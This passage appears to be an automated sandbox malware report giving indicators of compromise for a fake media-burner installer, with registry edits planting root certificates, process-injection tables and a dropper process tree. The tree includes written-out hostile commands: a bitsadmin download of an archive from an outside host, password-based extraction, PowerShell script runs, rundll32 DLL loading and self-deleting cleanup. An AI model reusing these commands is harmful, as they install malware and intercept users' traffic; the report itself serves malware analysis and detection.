6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Cekoqaesazhy.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	UNMqBm1lnY.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	UNMqBm1lnY.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Cekoqaesazhy.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\ProgramData:ApplicationData	E383.exe
File opened for modification	C:\ProgramData:ApplicationData	E383.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4424	PING.EXE
1980	PING.EXE
4368	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3828	ultramediaburner.tmp
3828	ultramediaburner.tmp
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe
1012	ZHesupyshoxae.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
388	Process not Found

Suspicious behavior: MapViewOfSection 60 IoCs

pid	Process
4996	MicrosoftEdgeCP.exe
4996	MicrosoftEdgeCP.exe
3640	FCEA.exe
4872	explorer.exe
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
1664	euvttjs
4380	swvttjs
3000	explorer.exe
3000	explorer.exe
4872	explorer.exe
4872	explorer.exe
4872	explorer.exe
4872	explorer.exe
2240	explorer.exe
2240	explorer.exe
2240	explorer.exe
2240	explorer.exe
3000	explorer.exe
3000	explorer.exe
3076	MicrosoftEdgeCP.exe
3076	MicrosoftEdgeCP.exe
2240	explorer.exe
2240	explorer.exe
3000	explorer.exe
3000	explorer.exe
4872	explorer.exe
4872	explorer.exe
2240	explorer.exe
2240	explorer.exe
2240	explorer.exe
2240	explorer.exe
3000	explorer.exe
3000	explorer.exe
3000	explorer.exe
3000	explorer.exe
4872	explorer.exe
4872	explorer.exe
4872	explorer.exe
4872	explorer.exe
3304	euvttjs
4364	swvttjs
4400	euvttjs
3988	swvttjs

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3640	Ultra.exe
Token: SeDebugPrivilege	1508	Cekoqaesazhy.exe
Token: SeDebugPrivilege	1012	ZHesupyshoxae.exe
Token: SeDebugPrivilege	4188	MicrosoftEdge.exe
Token: SeDebugPrivilege	4188	MicrosoftEdge.exe
Token: SeDebugPrivilege	4188	MicrosoftEdge.exe
Token: SeDebugPrivilege	4188	MicrosoftEdge.exe
Token: SeDebugPrivilege	5108	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5108	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5108	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5108	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4188	MicrosoftEdge.exe
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeDebugPrivilege	2200	choice.exe
Token: SeManageVolumePrivilege	4644	explorer.exe
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeDebugPrivilege	2252	app.exe
Token: SeImpersonatePrivilege	2252	app.exe
Token: SeTcbPrivilege	4176	svchost.exe
Token: SeTcbPrivilege	4176	svchost.exe
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeDebugPrivilege	4872	explorer.exe
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeDebugPrivilege	2240	explorer.exe
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeShutdownPrivilege	388	Process not Found
Token: SeCreatePagefilePrivilege	388	Process not Found
Token: SeDebugPrivilege	4872	explorer.exe
Token: SeShutdownPrivilege	388	Process not Found

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
3828	ultramediaburner.tmp
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4188	MicrosoftEdge.exe
4996	MicrosoftEdgeCP.exe
4996	MicrosoftEdgeCP.exe
4620	8B68.exe
5000	32F3.tmp.exe
4148	MicrosoftEdge.exe
3076	MicrosoftEdgeCP.exe
3076	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
388	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 896	512	Install.exe	74
PID 512 wrote to memory of 896	512	Install.exe	74
PID 512 wrote to memory of 896	512	Install.exe	74
PID 896 wrote to memory of 3640	896	Install.tmp	77
PID 896 wrote to memory of 3640	896	Install.tmp	77
PID 3640 wrote to memory of 2464	3640	Ultra.exe	80
PID 3640 wrote to memory of 2464	3640	Ultra.exe	80
PID 3640 wrote to memory of 2464	3640	Ultra.exe	80
PID 2464 wrote to memory of 3828	2464	ultramediaburner.exe	81
PID 2464 wrote to memory of 3828	2464	ultramediaburner.exe	81
PID 2464 wrote to memory of 3828	2464	ultramediaburner.exe	81
PID 3640 wrote to memory of 1508	3640	Ultra.exe	82
PID 3640 wrote to memory of 1508	3640	Ultra.exe	82
PID 3828 wrote to memory of 2624	3828	ultramediaburner.tmp	83
PID 3828 wrote to memory of 2624	3828	ultramediaburner.tmp	83
PID 3640 wrote to memory of 1012	3640	Ultra.exe	84
PID 3640 wrote to memory of 1012	3640	Ultra.exe	84
PID 1012 wrote to memory of 4452	1012	ZHesupyshoxae.exe	90
PID 1012 wrote to memory of 4452	1012	ZHesupyshoxae.exe	90
PID 1012 wrote to memory of 4608	1012	ZHesupyshoxae.exe	92
PID 1012 wrote to memory of 4608	1012	ZHesupyshoxae.exe	92
PID 4452 wrote to memory of 4660	4452	cmd.exe	104
PID 4452 wrote to memory of 4660	4452	cmd.exe	104
PID 4452 wrote to memory of 4660	4452	cmd.exe	104
PID 1012 wrote to memory of 4868	1012	ZHesupyshoxae.exe	95
PID 1012 wrote to memory of 4868	1012	ZHesupyshoxae.exe	95
PID 1012 wrote to memory of 3380	1012	ZHesupyshoxae.exe	99
PID 1012 wrote to memory of 3380	1012	ZHesupyshoxae.exe	99
PID 3380 wrote to memory of 4644	3380	cmd.exe	183
PID 3380 wrote to memory of 4644	3380	cmd.exe	183
PID 3380 wrote to memory of 4644	3380	cmd.exe	183
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 1012 wrote to memory of 4548	1012	ZHesupyshoxae.exe	102
PID 1012 wrote to memory of 4548	1012	ZHesupyshoxae.exe	102
PID 4548 wrote to memory of 4660	4548	cmd.exe	104
PID 4548 wrote to memory of 4660	4548	cmd.exe	104
PID 4548 wrote to memory of 4660	4548	cmd.exe	104
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 1012 wrote to memory of 4564	1012	ZHesupyshoxae.exe	221
PID 1012 wrote to memory of 4564	1012	ZHesupyshoxae.exe	221
PID 4996 wrote to memory of 5108	4996	MicrosoftEdgeCP.exe	98
PID 4564 wrote to memory of 3984	4564	Conhost.exe	171
PID 4564 wrote to memory of 3984	4564	Conhost.exe	171
PID 4564 wrote to memory of 3984	4564	Conhost.exe	171
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 3984 wrote to memory of 3640	3984	explorer.exe	168
PID 1012 wrote to memory of 4652	1012	ZHesupyshoxae.exe	109
PID 1012 wrote to memory of 4652	1012	ZHesupyshoxae.exe	109
PID 4652 wrote to memory of 4724	4652	cmd.exe	111
PID 4652 wrote to memory of 4724	4652	cmd.exe	111
PID 4652 wrote to memory of 4724	4652	cmd.exe	111
PID 1012 wrote to memory of 4856	1012	ZHesupyshoxae.exe	112
PID 1012 wrote to memory of 4856	1012	ZHesupyshoxae.exe	112
PID 1012 wrote to memory of 4500	1012	ZHesupyshoxae.exe	114
PID 1012 wrote to memory of 4500	1012	ZHesupyshoxae.exe	114
PID 4500 wrote to memory of 4444	4500	cmd.exe	117
PID 4500 wrote to memory of 4444	4500	cmd.exe	117

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:512
- C:\Users\Admin\AppData\Local\Temp\is-LQ56D.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-LQ56D.tmp\Install.tmp" /SL5="$301E0,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Users\Admin\AppData\Local\Temp\is-8FGJ4.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-8FGJ4.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Program Files\Microsoft Office\UXHABRRJYZ\ultramediaburner.exe
      "C:\Program Files\Microsoft Office\UXHABRRJYZ\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Users\Admin\AppData\Local\Temp\is-DOIDE.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DOIDE.tmp\ultramediaburner.tmp" /SL5="$8003A,281924,62464,C:\Program Files\Microsoft Office\UXHABRRJYZ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3828
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2624
  - - C:\Users\Admin\AppData\Local\Temp\38-8a12d-fb9-54687-b553933ce865b\Cekoqaesazhy.exe
      "C:\Users\Admin\AppData\Local\Temp\38-8a12d-fb9-54687-b553933ce865b\Cekoqaesazhy.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\af-2a3d3-a47-21dbd-49c9175b4a1b7\ZHesupyshoxae.exe
      "C:\Users\Admin\AppData\Local\Temp\af-2a3d3-a47-21dbd-49c9175b4a1b7\ZHesupyshoxae.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1012
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwp4nl33.ipf\instEU.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\uwp4nl33.ipf\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\uwp4nl33.ipf\instEU.exe
        6⤵
        
        PID:4660
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1nidpu0z.g3x\gpooe.exe & exit
        5⤵
        
        PID:4608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nn1q3zbx.aa5\google-game.exe & exit
        5⤵
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5q3vr02.d4w\md1_1eaf.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3380
      - C:\Users\Admin\AppData\Local\Temp\k5q3vr02.d4w\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\k5q3vr02.d4w\md1_1eaf.exe
        6⤵
        
        PID:4644
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e52befxt.gyr\y1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4548
      - C:\Users\Admin\AppData\Local\Temp\e52befxt.gyr\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\e52befxt.gyr\y1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\UNMqBm1lnY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\UNMqBm1lnY.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:3644
        
        C:\Users\Admin\AppData\Roaming\1619185419094.exe
        
        "C:\Users\Admin\AppData\Roaming\1619185419094.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619185419094.txt"
        8⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\UNMqBm1lnY.exe"
        8⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:4424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\e52befxt.gyr\y1.exe"
        7⤵
        
        PID:4400
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:4224
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tprjednq.hnl\toolspab1.exe & exit
        5⤵
        
        PID:4564
      - C:\Users\Admin\AppData\Local\Temp\tprjednq.hnl\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tprjednq.hnl\toolspab1.exe
        6⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\tprjednq.hnl\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tprjednq.hnl\toolspab1.exe
        7⤵
        
        PID:3640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uj040lap.e21\SunLabsPlayer.exe /S & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4652
      - C:\Users\Admin\AppData\Local\Temp\uj040lap.e21\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\uj040lap.e21\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:4388
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:4376
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pC2KRn2c9fiF7FlK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5044
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plg2ZLYGSphKc5Eq -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:4108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
        7⤵
        Loads dropped DLL
        
        PID:1476
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll" AotYqZ
        8⤵
        Loads dropped DLL
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:3728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
